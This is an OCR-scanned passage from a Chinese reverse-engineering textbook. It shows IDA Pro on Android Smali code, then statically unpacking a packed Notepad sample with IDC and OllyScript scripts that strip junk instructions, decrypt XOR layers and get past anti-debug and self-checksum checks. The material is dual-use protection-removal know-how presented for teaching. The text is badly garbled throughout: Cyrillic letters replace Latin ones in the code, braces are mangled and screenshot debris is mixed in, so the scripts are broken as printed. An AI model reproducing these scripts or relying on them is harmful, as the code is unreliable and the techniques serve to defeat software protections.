在 Exports 选项 卡 中 任意 选择 一 项 ， 双 击 后 即 可 跳 转 到 相应 的 反 汇 编 代码 位 置 ， 例 如 ，SimpleCursor- 
Adapter.swapCursor@LL 项 的 反 汇编 代 码 位 置 的 代码 如 下 所 示 。 
CODE:0002CFCC Method 2589 (0xa1d): 
CODE:0002CFCC public android.database.Cursor 
CODE:0002CFCC android.support.v4.widget.SimpleCursorAdapter. 
swapCursor( 
CODE:0002CFCC android.database.Cursor p0) 
CODE:0002CFCC this = v2 
CODE:0002CFCC p0 = v3 
CODE:0002CFCC invoke-super (this, pO), «ref ResourceCursorAdapter. 
swapCursor(ref) imp. @ def ResourceCursorAdapter ` 
swapCursor@LL> 
CODE:0002CFD2 move-result-object vO 
CODE:0002CFD4 iget-object v1, this, SimpleCursorAdapter_mOriginalFrom 
CODE:0002CFD8 invoke-direct (this, v1), «void SimpleCursorAdapter. 
findColumns(ref) SimpleCursorAdapter_findColumns@VL> 
CODE:0002CFDE 
CODE:0002CFDE locret: 
CODE:0002CFDE return-object м0 
CODE:0002CFDE Method End 
在 IDA Pro 操作 界面 中 , 反 汇 编 代码 使 用 关键 字 ref 表示 非 Java 标准 类 型 的 引用 。 例如 , 在 上 述 代码 中 ， 
方法 第 1 行 中 的 指令 invoke-super 的 前 半 部 分 如 下 所 示 。 
invoke-super (this, p0}, <ref ResourceCursorAdapter.swapCursor(ref) 
其 中 前 面 的 ref 关键 字 表示 方法 swapCursor0) 的 返回 类 型 ， 后 面 括号 中 的 ref 关键 字 表示 参数 类 型 。 
而 后 半 部 分 的 代码 是 IDA Pro 智能 识别 的 ， 通 过 识别 Android SDK 中 API 函数 的 方式 ， 并 结合 使 用 关 
键 字 imp 进行 标识 ， 例 如 ， 在 第 1 行 指令 的 invoke-super 的 后 半 部 分 如 下 所 示 。 
imp. @ _def_ResourceCursorAdapter_swapCursor@LL 
在 上 述 代码 中 ，imp 表示 该 方法 是 Android SDK 中 的 API，@ 后 面 的 部 分 是 API 的 声明 ， 并 且 在 类 名 与 
方法 名 之 间 需 要 使 用 下 划 线 分 隔 。 
通过 使 用 IDA Pro， 可 以 隐 式 传递 this 引用 。 因 为 在 Smali 语言 程序 中 可 以 使 用 寄存 器 pO 来 传递 this 
指针 ， 在 此 处 使 用 this 取代 了 p0， 所 以 后 面 的 寄存 器 命名 都 必须 依次 减 1。 
除 此 之 外 ，IDA Pro 还 可 以 识别 代码 中 的 循环 、switch 语句 和 Try/Catch 结构 语句 ， 并 能 将 其 以 类 似 高 
级 语言 的 结构 形式 显示 出 来 ， 这 在 分 析 大 型 程序 时 对 了 解 代码 结构 有 很 大 的 帮助 。 
在 现实 应 用 中 ,使 用 IDA Pro 工具 定位 关键 代码 的 方法 与 定位 Smali 关键 代码 的 方法 类 似 ， 其 中 最 为 常 
用 的 方法 有 如 下 3 种 。 
(1) 搜索 特征 字符 串 
о 首先 通过 快捷 键 Ctrl+S 打 开 “ 段 选择 ”对 话 框 。 


e. 
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O 双击 STRINGS 段 落 跳 转 到 字符 串 段 。 

0 选择 Search | text 命 令 打开 文本 搜索 对 话 框 , 在 String 旁 边 的 文本 框 中 输入 要 搜索 的 字符 串 , 单 击 OK 
按钮 后 会 定位 到 搜索 结果 。 

(2) 搜索 关键 API 

首先 按 下 快捷 键 Ctrl+S 打 开 “ 段 选择 ”对 话 框 。 

双击 第 一 个 CODE 段 跳 转 到 数据 起 始 段 。 

依次 选择 Search | text 命 令 打开 文本 搜索 对 话 框 。 

在 String 旁 边 的 文本 框 中 输入 要 搜索 的 API 名 称 ， 单 击 OK 按钮 后 会 定位 到 搜索 结果 。 

如 果 API 被 调用 多 次 ， 可 以 按 下 快捷 键 Ctrl+T 来 继续 搜索 下 一 项 。 

(3) 通过 方法 名 进行 判断 

这 种 方法 比较 烦琐 ， 实 现 效率 低 ， 所 以 不 常用 。 


ooooo 
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Фин 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 14 章 \ 脱 这 实战 .avi 
在 本 节 的 内 容 中 , 将 通过 一 个 具体 实例 来 讲解 IDA Pro 工具 的 基本 用 法 , 讲解 对 一 个 简单 文件 进行 脱 壳 
的 基本 方法 。 本 节 的 实例 来 源 于 开源 代码 ， 具 体 下 载 路 径 是 http://bbs.pediy.com/upload/bbs/unpackfaq/ 


notepad.upx.rar。 


14.2.1 在 工作 窗口 中 打开 


在 IDA Pro 工具 栏 的 下 方 是 工作 窗口 ， 工 作 窗口 占据 了 绝 大 部 分 界面 。IDA Pro 的 工作 窗口 主要 分 为 IDA 
View-A. Name. Strings. Exports 和 Imports 这 5 个 选项 卡 。 后 面 3 个 分 别 是 字符 参考 、 输 出 函数 参考 和 输 
入 函数 参考 。Name 是 命名 窗口 ， 显 示 命名 的 函数 或 者 变量 。 这 4 个 窗口 都 支持 索引 功能 ， 可 以 通过 双击 来 
快速 切换 到 分 析 窗 口中 的 相关 内 容 ， 使 用 起 来 十 分 方便 ， 如 图 14-7 所 示 。 


国 па Viera | N Names| - Strings ÈD Exports | Imperts| 


Hane [Address | Ordinal | 
Eh ZwALlocatelserPhysicalPages ТТРЗ22АР 958 
ÈD ZwALlocateVuids TIF322€3 957 
ÈD ZwALlocateVirtualilemory ттрз2207 958 
ÈD ZwApphelpCacheControl TTF322EB 959 
ÈD Zvhe elfappedFilesTheSane TTF3227F 960 
ÈD ZwAssi gnProcessToJobObject TTF32313 961 
SB ZeCallbackReturn TTF32327 962 
ËB ZeCancel Devi ce¥akeupRequest TIPXS3B — 963 
ÈD ZwCancelIoFile TTF32347 964 
ÈD ZeCancelTimer TIF32363 965 
ÈD ZeClearEvent TTF32377 966 
ËB2sClose TIF3238B 96т 
ÈD 2 Close0bjectAuditAlarm TF3239F 968 
ÈD ZvCoapactKeys TIFS23B3 968 
ÈD zsConpareTokens. TTF323C7 это 
ÈD ZwCompleteConnectPort TTF323DB gn 
ŠD zsCoapressKey ТТЕЗОЗЕР 972 
ÈD 24Сопдес{Рог TTF32403 973 
ÈD ZeContinue TIF35253 974 
ÈD ZwCreateDirectorybiect TIF3242B — 916 
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IDA View-A 是 一 个 分 析 窗口 , 除了 可 以 支持 常见 的 反 汇 编 模 式 , 还 提供 了 很 多 图 形 视图 功能 , 如 图 14-8 


所 示 。 
77F3aB8B loc_77F3aB8B: E CODE Wher -mep 
77F35B8B and ebx, 3 
77F34B8E jz Short loc 77F35883 Ыз. CCR Taare 
77F3ABSE 8518. 
77Е34898 loc 77F38B83: ; CODE XREF: _< 
77F3AB98 loc 77F3hB90: z gie nou eax, [esp+0Ch+arg_ 0] 
77F38B98 КЕР үт: в рор ерх 
77F34B98 поо x pop esi 
77F34B92 add BODAN. рор edi 
77F34B95 mou retn 
77F34B97 add 
77F3AB9R test 了 
———— loc 77F3ABRB: ; CODE XREF: = 
1 TTF3486B. _strncpy:loc_TTF34B8B 


图 14-8 IDA View-A 窗口 界面 
使 用 IDA Pro 打开 下 载 的 源码 ， 其 图 形 视图 界面 在 IDA Pro 中 的 效果 如 图 14-9 所 示 。 


j near ptr dword_4010CC 
Start endp 


图 14-9 图 形 视图 界面 效果 
在 上 述 图 形 视 图 界面 中 ,标签 40EAOE 是 壳 的 出 口 代码 地 址 。 在 OD 中 直接 跳 到 该 地 址 并 下 断 点 ， 然 后 
运行 到 该 位 置 ， 再 单 步 执行 便 能 看 到 OEP 了。 
14.2.2 ”使 用 IDC 静态 分 析 


有 时 需要 分 析 一 些 非 文件 格式 的 代码 ， 例 如 ShellCode、 远 线程 注入 和 病毒 。 这 些 代码 的 特点 是 动态 获 
取 API， 这 给 静态 分 析 带 来 困难 。 尽 管 IDA 支持 分 析 二 进 制 文件 ， 但 是 在 缺少 IAT 的 情况 下 ， 分 析 起 来 很 
不 方便 。 频 繁 切换 调试 器 查看 并 不 是 一 个 好 方法 。IDC 是 IDA 的 脚本 


PRO Й . ih x| 
语言 ， 功 能 强大 ， 提 供 了 另 一 条 与 调试 器 交互 的 途径 。 | 


IDA 提供 多 种 文件 格式 输出 ,调试 器 可 以 通过 解释 这 些 文件 获得 一 
些 符号 。 可 以 通过 文件 菜单 中 的 “创建 文件 ”获得 更 多 的 信息 。 以 OD 
为 例 ， 其 GODUP 插件 支持 解释 MAP 文件 〈 还 能 加 载 IDA 的 SIG) 。 
在 IDA 中 ， 依 次 选择 “文件 ”| “创建 文件 ”| “创建 MAP 文件 ” 命 
令 即 可 创建 一 个 MAP 文 件 ,然后 切换 到 OD, 依次 选择 “插件 ”| GODUP 
Plugin | Map Loader | Load labels 命令 即 可 获得 符号 。 

在 此 以 下 载 的 UPX 加 过 的 NOTEPAD 为 素材 ， 使 用 OD 打开 ,在 
到 达 ОЕР 之 后 DUMP 下 来 ， 不 修复 输入 表 ， 直 接 用 IDA RAHASI 
如 图 14-10 所 示 的 界面 。 

在 此 需要 注意 的 是 ，Make imports segment 是 РЕ 文件 特有 的 选项 ， 
该 选项 会 隐藏 输入 表 区 域 的 所 有 数据 ， 同 时 能 在 图 表 功 能 中 看 到 API 
的 调用 。 假如 希望 查看 在 输入 表 的 范围 内 的 代码 或 数据 ,需要 选择 “ 编 。 “图 14-10 丰富 的 文件 载 入 选项 
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辑 ”| “区 段 ” 命 令 以 删除 遮挡 数据 的 部 分 区 段 。 

为 了 更 真实 地 模拟 从 内 存 中 截取 代码 的 情况 ,在 这 里 选择 Binary file， 载 入 偏 移 量 选 400000 根 据 实际 
代码 在 内 存 中 的 基 址 来 选择 ) ， 然 后 IDA 就 开始 尝试 分 析 可 能 存在 于 该 文件 中 的 代码 。 对 照 OD 中 的 OEP 
地 址 ， 在 IDA 中 可 以 看 到 如 下 代码 。 

seg000:004010CC push ebp 

seg000:004010CD mov ebp, esp 

seg000:004010CF sub esp, 44h 

seg000:004010D2 push esi 

seg000:004010D3 call ds:dword_4063E4 

seg000:004010D9 mov esi, eax 

seg000:004010DB mov al, [eax] 

seg000:004010DD cmp al, 22h 

seg000:004010DF jnz short loc_4010FC 

在 OD 中 对 应 的 显示 如 下 。 

004010D3 FF15 E4634000 call dword ptr [4063E4]; kernel32.GetCommandLineA 

使 用 以 下 ollyscript 提取 IAT 的 符号 。 

varea 

var Ecount по 分隔 号 的 计数 器 

var oFile 


ask "请 输入 IAT 起 始 地 址 " 
cmp $RESULT, 0 

je ECancel 

mov ea, $RESULT 

ask "输出 文件 ? " 

cmp $RESULT, 0 

je ECancel 

mov oFile, $RESULT 


TryGetSym: 

GN [ea] // 获 取 该 地 址 的 符号 

cmp $RESULT,00000000 /WOLLYSCRIPT 是 区 分 00000000 和 0 的 
je ETest 

WRTA oFile,$RESULT 2 

mov Ecount,0 

add ea,4 

jmp TryGetSym 


ECancel: 
msg "无 效 输入 " 


ret 


ETest: 

cmp Ecount,1 /不同 模块 的 地 址 以 0 分 隔 

je Send // 车 存在 两 个 DWORD 的 0 则 认为 是 未 尾 
add Ecount,1 

add ea,4 

jmp TryGetSym 
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SEnd: 

Ret 

使 用 下 面 的 IDC 脚本 可 以 获取 符号 并 对 相应 地 址 重 命名 。 
#include <idc.idc> 


static main() ( 
auto Sbuffer,ea,zcount filehandle,fileName,CustEa; 
fileName = AskFile (0,"*.*","TFF IAT 符号 文件 "); 
CustEa = AskAddr(0," 目 标 IAT 地 址 "); 
filehandle = fopen(fileName,"r"); 
for (ea = CustEa; zcount < 2; ea = ea + 4( 
if (Dword(ea) !-0)( 
Sbuffer = readstr(filehandle); 


if(strlen(Sbuffer) < 2){ llollyscript 的 输出 文件 存在 无 效 字 符 
Sbuffer = readstr(filehandle); // 如 果 字 符 无 效 则 再 取 一 次 字符 
E (ea,Sbuffer,SN AUTO ); /为 对 应 DWORD 改名 
zcount = 0; 
} 
else( 
zcount = zcount + 1; 
} 
} 
fclose(filehandle) ; 
} 
此 时 就 可 以 正常 显示 函数 调用 的 API 了。 
seg000:004010CC push ebp 


seg000:004010CD mov ebp, esp 
seg000:004010CF sub esp, 44h 
seg000:004010D2 push esi 

seg000:004010D3 call ds:GetCommandLineA _ 
seg000:004010D9 mov esi, eax 
seg000:004010DB mov al, [eax] 
seg000:004010DD cmp al, 22h 
seg000:004010DF jnz short loc 4010FC 


14.2.3 ”静态 脱 壳 


在 接 下 来 的 内 容 中 ， 将 尝试 在 不 运行 过 的 情况 下 把 壳 脱 掉 。 首 先 用 IDA 加 载 该 过 的 主 程序 。 
seg005:004560FA loc 4560FA: ; CODE XREF: startloc 4560F4 j 
seg005:004560FA call sub 456109 

seg005:004560FA 

seg005:004560FA start endp /入 口 函数 的 结尾 
seg005:004560FA 

seg005:004560FF 

seg005:004560FF 

seg005:004560FF 

seg005:004560FF sub 4560FF proc near ; CODE XREF: seg005:00456104 p 
5е9005:004560ЕҒ ; sub 456109 p /红色 

seg005:004560FF call sub 456DEF 
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seg005:004560FF 

seg005:004560FF sub 4560FF endp 

seg005:004560FF 

seg005:00456104 call sub_4560FF 

seg005:00456104 

seg005:00456109 

seg005:00456109 

seg005:00456109 

seg005:00456109 sub 456109 proc near ; CODE XREF: start:loc 4560FA p 

eg005:00456109 call near ptr sub 4560FF-1 //+1 表示 反 汇 编 出 现 混乱 

正常 的 交叉 参考 标记 是 绿色 , 当 显 示 为 红色 时 则 证 明 与 其 他 部 分 的 反 汇 编 代 码 产 生 冲 突 。 另 外 , 在 jcc、 
jmp 和 call 后 面 出 现 “+X” 的 符号 (X 为 任意 数字 ) ， 一 般 也 为 反 汇 编 出 现 混乱 。 在 正式 分 析 之 前 ， 必 须 
找到 花 指令 的 规律 ， 编 写 脚本 ， 除 去 影响 。 现 在 从 最 初 产生 影响 的 地 方 开始 。 单 击 地 址 4560FF， 按 
р. 

seg005:004560FF byte 4560FF db 0E8h; CODE XREF: seg005:00456p 

5е9005:00456100 ипк 456100 db OEBh ;? ; CODE XREF: sub 456109 p 

seg005:00456101 db 0Ch 

seg005:00456102 db 0 

seg005:00456103 db 0 

seg005:00456104 call near ptr byte_4560FF 

注意 00456104 处 也 是 花 指令 之 一 ， 其 功能 是 让 IDA 误 以 为 004560FF 处 为 有 效 指 令 。 因 此 也 在 该 位 置 

上 按 D 键 ， 将 其 转换 为 数据 ， 而 在 00456100 处 按 C 键 转换 为 代码 。 

seg005:004560FA call sub 456109 

seg005:004560FA 

seg005:004560FA start endp 

seg005:004560FA 

seg005:004560FA ; 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 - 一 

seg005:004560FF db 0E8h 

seg005:00456100 ; ————— 

seg005:00456100 

seg005:00456100 loc_456100: ; CODE XREF: sub 456109 p 

seg005:00456100 jmp short loc_45610E 

seg005:00456100 

seg005:00456100 ; ————— 

seg005:00456102 db 0 

seg005:00456103 db 0 

5е9005:00456104 db OE8h 

5е9005:00456105 db OF6h ; ? 

5е9005:00456106 db OFFh 

5е9005:00456107 db OFFh 

5е9005:00456108 db OFFh 

seg005:00456109 

seg005:00456109 

seg005:00456109 sub 456109 ргоспеаг ; CODE XREF: startloc 4560FA p 

ѕе9005:00456109 call loc 456100 

seg005:00456109 

seg005:0045610E 

ѕе9005:0045610Е loc 45610E: ; CODE XREF: seg005:loc_456100 j 

seg005:0045610E add esp, 8 
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现在 手动 修正 了 一 处 被 花 掉 的 代码 。 因为 OPCODE 的 E8 和 EB 后 面 实际 是 一 个 相对 地 址 偏 移 , 而 不 是 
地 址 编码 〈 反 汇编 翻译 成 地 址 以 便于 分 析 ) ， 所 以 可 以 通过 搜索 内 存 中 相应 指令 序列 的 方式 ， 告 诉 IDA fF 
么 是 代码 ， 什 么 不 是 。 读 者 可 以 尝试 找 出 壳 中 花 指令 的 规律 ， 然 后 对 比 一 下 结果 。 

经 过 手动 整理 之 后 ， 发 现 壳 使 用 了 下 面 4 种 花 指令 代码 。 

花 指令 1: 

call label1 

db 0E8h 

label2: 

jmp label3 


label3: 
add esp, 8 
花 指令 2: 
Jz label1 
Jnz label1 
db OEBh 
db 2 
label1: 
jmp label2 
db 81h 
label2: 
花 指 令 3: 
push eax 
call label1 
db 29h 
db 5Ah 
label1: 
pop eax 
imul eax, 3 
Call label2 
db 29h 
db 5Ah 
label2: 
add esp, 4 
pop eax 
花 指令 4; 
Jmp label1 
db 68h 
Label1: 
Jmp label2 
db OCDh, 20h 
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Label2: 
Jmp label3 
db 0E8h 
Label3: 
在 知道 花 指 令 结构 之 后 ， 可 以 很 容易 地 写 出 下 面 脚本 , 用 NOP (0x90h) 来 代替 干扰 的 反 汇 编 器 的 数据 。 
static PatchJunkCode() ( 
auto x,FBin,ProcRange; 


FBin = "E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF"; 
// 花 指令 1 的 特征 码 
for (х = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin)){ 


х=х+5; 

PatchByte (x,0x90); 
х=х+3; 

PatchByte (x,0x90); 

х++; 

PatchWord (х,0х9090); 
х=х+2; 

PatchDword (x,0x90909090); 


FBin = "74 04 75 02 EB 02 EB 01 81"; 
// 花 指令 2 的 特征 码 
for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin))( 


х=х+4; 

PatchWord (х,0х9090); 
х=х+4; 

PatchByte (x,0x90); 


} 
FBin = "50 E8 02 00 00 00 29 5А 58 6В СО 03 E8 02 00 00 00 29 5А 83 C4 04"; 
// 花 指令 3 的 特征 码 
for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin))( 


х=х+6; 

PatchWord (x,0x9090); 
х=х+ 11; 

PatchWord (x,0x9090); 


FBin = "EB 01 68 EB 02 CD 20 EB 01 E8"; 
// 花 指令 4 的 特征 码 
for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin))( 


x = x+2; 

PatchByte (x,0x90); 

x = x+3; 

PatchWord (x,0x9090); 
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x = x+4; 
PatchByte (x,0x90); 
} 


} 
由 此 可 见 ， 在 花 指 令 中 并 不 包含 任何 有 意义 的 数据 ， 在 花 指 令 的 前 后 ， 堆 栈 是 平衡 的 ， 各 寄存 器 的 数 
值 也 是 不 变 的 。IDC 提供 了 隐藏 区 域 的 命令 ， 现 在 来 看 以 下 脚本 。 
static HideJunkCode() ( 
auto x,y,FBin; 


FBin = "E8 0A 00 00 00 E8 EB OC 00 00 E8 F6 FF FF FF"; 


for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin)){ 
MakeUnknown (x,0x17,1); 

y = x + 0x17; 

HideArea (x,y,atoa(x),atoa(x),atoa(y),-1); 


FBin = "74 04 75 02 EB 02 EB 01 81"; 


for (x = FindBinary(MinEA(),0x03, FBin);x != BADADDR;x = FindBinary(x,0x03,FBin)){ 
MakeUnknown (x,0x09,1); 

y = x + 0x09; 

HideArea (x,y,atoa(x),atoa(x),atoa(y),-1); 


} 
FBin = "50 E8 02 00 00 00 29 5А 58 6В СО 03 E8 02 00 00 00 29 5А 83 С4 04"; 


for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin))( 
MakeUnknown (x,0x17,1); 

y = x + 0x17; 

HideArea (x,y,atoa(x),atoa(x),atoa(y),-1); 


FBin = "EB 01 68 EB 02 CD 20 EB 01 E8"; 


for (x = FindBinary(MinEA(),0x03,FBin);x != BADADDR;x = FindBinary(x,0x03,FBin))( 
MakeUnknown (x,0x0a,1); 
y = x + 0x0a; 
HideArea (x,y,atoa(x),atoa(x),atoa(y),-1); 
} 


} 
因为 花 指令 的 关系 ， 会 使 IDA 错误 识别 指令 ， 可 能 隐藏 区 域 的 边界 刚好 在 一 条 指令 的 机 械 码 中 间 ， 这 
样 隐藏 的 操作 便 会 失败 。 所 以 在 执行 隐藏 指令 之 前 ,需要 先 使 用 MakeUnknown 将 目标 代码 设置 为 未 识别 的 
状态 。 在 完成 隐藏 和 替换 之 后 ， 再 使 用 分 析 引 擎 来 分 析 代 码 。 
static main() ( 
auto x,FBin, ProcRange; 
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HideJunkCode(); 
PatchJunkCode(); 


AnalyzeArea (MinEA(),MaxEA()); 
} 

CleanJunkCode.idc 

在 运行 脚本 之 后 ， 首 先 看 修复 的 成 果 ， 修 复 之 后 的 代码 如 下 所 示 。 

seg005:0045639F rdtsc 

seg005:004563A1 push eax 

seg005:004563A2 rdtsc 

seg005:004563A4 ; seg005:004563A4 // 被 隐藏 的 区 域 

seg005:004563BB sub eax, [esp-8*arg 4] 

seg005:004563BE ; seg005:004563BE 

seg005:004563C7 ; 

seg005:004563C7 

5е9005:004563С7 loc_4563C7: ; CODE XREF: sub_4563B3:loc_4563C4 j 

5е9005:004563С7 add esp, 4 

5е9005:004563СА ; seg005:004563CA 

5е9005:004563Е1 cmp eax, OFFFh 

seg005:004563E6 ; seg005:004563E6 

seg005:004563F0 

seg005:004563F0 loc_4563F0: ; CODE XREF: sub 4563D9:loc 4563ED j 

seg005:004563F0 jbe short loc 45640D 

seg005:004563F0 

5е9005:004563Р2 ; seg005:004563F2 

5е9005:004563ЕС 

5е9005:004563ҒС loc 4563FC: ; CODE XREF: sub 4563D9:loc 4563F9 j 

seg005:004563FC int 3  ; Trap to Debugger 

seg005:004563FD mov ax, OFEh 

seg005:00456401 ; seg005:00456401 

seg005:0045640A 

seg005:0045640A Іос 45640А: ; CODE XREF: sub 4563D9:loc 456407 j 

seg005:0045640A out 64h, ax  ; AT Keyboard controller 8042. 

seg005:0045640A ; Resend the last transmission 

seg005:0045640A 

seg005:0045640D ; seg005:0045640D 

由 此 可 见 ， 除 了 sub eax, [esp-8+arg_4] 〈 实 际 上 是 sub eax,[esp]) 看 起 来 有 点 奇怪 之 外 ， 其 余 一 切 正常 。 
作为 一 个 壳 ， 在 解决 了 花 指 令 之 后 ， 剩 下 的 问题 便 只 有 反 调试 代码 和 解密 (解压 缩 》 代 码 了 。 例 如 ， 上 面 
列 出 的 代码 是 通过 时 间 校 验 检查 调试 器 ， 一 旦 检查 到 ， 便 使 用 特权 级 指令 ， 让 程序 发 生 异常 ， 无 法 继续 运 
行 下 去 。 当 然 ， 在 静态 的 环境 下 ， 反 调试 技巧 变 得 毫 无 意义 。 尽 管 如 此 ， 仍 然 需 要 知道 程序 会 在 什么 时 候 
运行 到 什么 地 方 ， 最 常见 的 利用 系统 的 机 制 莫 过 于 SEH 了 ， 现 在 来 看 看 下 面 设 置 SEH 的 代码 。 

seg005:00456A9B call $+5 

seg005:00456AA0 add dword ptr [esp+0], 136Fh 

seg005:00456AA7 push large dword ptr fs:0 

seg005:00456AAE mov large fs:0, esp 

其 中 ， 在 call $+5 指令 后 堆栈 中 的 内 容 是 其 下 一 条 指令 在 内 存 中 的 地 址 ， 这 是 病毒 常用 的 重 定位 技巧 。 
按 快 捷 键 shift+/ 后 输入 0x00456AA0+0x136F 便 可 以 计算 出 异常 处 理 函数 的 地 址 〈457EOF) ， 下 面 是 产生 异 
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seg005:0045745C xor eax, eax 

seg005:0045745E movzx eax, byte ptr [eax] 

现在 应 该 跳 转 到 457EOF 继续 分 析 , 开始 跟着 程序 的 流程 把 解密 相关 的 代码 找 出 来 , 解密 代码 如 下 所 示 。 

seg005:00459191 push ecx 

seg005:00459192 xor ecx, ecx 

seg005:00459194 call $+5 

seg005:00459199 pop edi 

seg005:0045919A add edi, 9C4h 

seg005:004591A0 pop edx 

seg005:004591A1 add edx, 15h 

seg005:004591A4 loc 4591A4: ; CODE XREF: sub 459149+6B j 

seg005:004591A4 movzx eax, byte ptr [ecx+edi] 

seg005:004591A8 xor eax, edx 

seg005:004591AA mov [ecx-edi], al 

seg005:004591AD inc ecx 

seg005:004591AE cmp ecx, 93h 

5е9005:004591В4 jb short loc_4591A4 

这 样 可 以 很 容易 看 出 这 就 是 解密 代码 ， 在 循环 之 中 有 修改 内 存 的 指令 。 而 解密 的 KEY 就 是 00459191 
处 ECX 的 值 +15h。 看 下 面 检查 硬件 断 点 的 代码 。 

seg005:004587B6 mov eax, [esp+0Ch] 

seg005:004587BA xor ecx, ecx 

seg005:004587BC xor ecx, [eax*4] 

seg005:004587BF xor ecx, [eax*8] 

5е9005:004587С2 xor ecx, [eax+0Ch] 

5е9005:004587С5 xor ecx, [eax+10h] 

在 上 述 代 码 中 ， 假 如 没有 设置 硬件 断 点 ， 那 么 ECX 的 结果 应 该 是 0。 

这 样 在 知道 解密 代码 的 所 有 关键 要 素 之 后 ， 就 可 以 开始 动手 写 脚本 了 。 

#include "idc.idc" 


static main() ( 
auto StartAddr,cKey,Cbuffer,Counter; 


StartAddr = 0x00459199 + 0x9c4; 
cKey = 0x15; 


for (Counter = 0 ; Counter < 0x93; Counter ++){ 


Cbuffer = Byte(StartAddr) ^cKey; 11 movzx eax, byte ptr [ecx+edi] 
11 xor eax, edx 
PatchByte(StartAddr,Cbuffer); // mov [ecx+edi], al 
StartAddr++; 
} 
р 


在 00459BF7 和 0045В1ЕС 处 可 以 看 到 类 似 的 加 密 代码 ， 这 样 在 第 三 次 解密 之 后 ， 终 于 可 以 看 到 不 同 的 
解密 代码 了 ， 将 隐藏 区 域 的 部 分 删 掉 后 ， 自 校 验 代 码 如 下 所 示 。 

seg005:00461F8D call $+5 

seg005:00461F92 pop ecx 

seg005:00461F9D sub ecx, 5 

seg005:00461FAA xor ebx, ebx 
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seg005:00461FB6 mov eax, OBE9Ch 

seg005:00461FC5 mov edi, ecx 

seg005:00461FD1 sub edi, eax 

seg005:00461FDD movzx eax, byte ptr [edi] 

seg005:00461FEA add ebx, eax 

seg005:00461FF6 inc edij 

seg005:00462001 cmp edi, ecx 

seg005:0046200D jb short loc_461FDD 

由 此 可 见 ， 自 校 验 代 码 的 两 个 特征 ， 一 是 读 取代 码 ， 二 是 循环 。 对 于 那 种 单纯 与 校 验 结果 比较 控制 流 
程 的 程序 来 说 并 不 需要 理会 自 校 验 。 在 本 实例 中 ， 因 为 紧 跟 后 面 的 代码 便 是 解密 代码 ， 并 且 自 校 验 值 作为 
解密 KEY， 所 以 需要 计算 出 它 的 校 验 值 。 自 校 验 后 的 解密 代码 如 下 所 示 。 

seg005:0046200F mov edi, offset unk 447000 

seg005:00462014 mov ecx, 0BCOOh 

5е9005:00462019 ; seg005:00462019 

seg005:00462023 movzx eax, byte ptr [edi] 

seg005:00462030 add bl, bh 

seg005:00462032 xor bl, bh 

seg005:00462034 xor al, bl 

seg005:00462040 mov [edi], al 

seg005:0046204C inc edi 

Seg005:00462057 dec ecx 

seg005:00462062 jnz short loc 462019 

在 编写 好 脚本 之 后 需要 重新 加 载 程序 ， 然 后 按 顺 序 把 解密 脚本 运行 一 次 ， 这 样 可 以 确保 能 够 解 出 正确 
的 代码 。 此 外 还 需 注 意 如 下 自修 改 的 代码 。 

seg005:00462064 call $+5 

seg005:00462069 pop ecx 

seg005:0046206A sub [ecx+16h], ebx 

seg005:0046206D popa 

seg005:0046206E pusha 

seg005:0046206F mov esi, offset unk 447000 

seg005:00462074 lea edi, [esi-46000h] 

seg005:0046207A push edi 

seg005:0046207B or ebp, OFFFFFFFFh 

seg005:0046207E push offset sub 4528D0 

seg005:00462083 retn 

在 上 述 代码 中 ，0046206A 实际 上 就 是 以 前 面 的 校 验 值 对 0046207E 处 的 指令 修改 。 如 果 校 验 不 正确 ， 
便 无 法 获得 正确 的 返回 地 址 。 在 写 脚本 时 遇 到 一 个 问题 是 ， 解 密 代码 使 用 BLA BH, BBX 的 低 八 位 和 
高 八 位 的 寄存 器 。 可 以 先 将 校 验 值 写 进 一 个 DWORD， 然 后 获取 其 中 第 一 个 BYTE 和 第 二 个 BYTE， 便 可 
以 得 到 它 的 值 了 。 由 此 便 可 得 出 下 面 的 脚本 。 

#include "idc.idc" 


static main() ( 
auto StartAddr,EndAddr, cKey,IKey,hKey, Cbuffer,Kbuffer, Counter; 


EndAddr = 0x00461F92 - 0x5; 
cKey = 0; 


for (StartAddr = EndAddr - OXOBE9C; StartAddr < EndAddr; StartAddr ++)( 
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cKey = cKey + Byte(StartAddr); l| movzx eax, byte ptr [edi] 
Пада ебх, eax 
} 
Kbuffer = Dword(MinEA()); /从 镜像 基 址 借用 一 个 Dword 
PatchDword(MinEA(),cKey); 
IKey=Byte(MinEA()); /| 转换 成 bl 
hKey=Byte(MinEA()+1); /转换 成 bh 


StartAddr = 0x447000; 


for (Counter = 0x0BC00 ; Counter !=0 ; Counter --){ 


IKey=IKey + hKey; İl add bl, bh 
IKey-IKey ^ hKey; ll xor bl, bh 
Cbuffer = Byte(StartAddr) ^IKey; 11 movzx eax, byte ptr [edi] 
ll xor al, bl 
PatchByte(StartAddr,Cbuffer); 11 mov [edi], al 
StartAddr++; 
} 


StartAddr = 0х462069+0х16; 
PatchByte(MinEA(),IKey); 
cKey = Dword (MinEA()); 
Cbuffer = Dword(StartAddr) - cKey; 
PatchDword(StartAddr,Cbuffer); 
PatchDword(MinEA() Kbuffer); /恢复 原来 的 数据 
) 
这 样 在 还 原 代 码 之 后 ， 可 以 很 容易 地 看 出 0046207E 的 位 置 PUSH + RET 相当 于 一 个 绝对 跳 转 ， 现 在 看 


452800 处 的 代码 , 在 452800 处 按 P 键 , IDA 将 认为 该 处 为 函数 的 起 点 , 并 为 函数 建立 图 形 视图 , 如 图 14-11 
所 示 。 
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图 14-11 图 形 视图 


虽然 图 形 视图 看 起 来 很 复杂 ， 但 是 只 需要 将 其 还 原 成 IDC 代码 即 可 ， 甚 至 不 需要 理解 算法 的 思想 。 例 
若 觉得 C 代码 更 容易 理解 ,那么 可 以 先 把 汇编 转 成 С 代码 后 再 理解 。 现 在 切换 到 反 汇 编 窗 口 再 看 代码 。 
seg001:004528D0 jmp shortloc 4528E2 ”// 跳 到 开始 位 置 

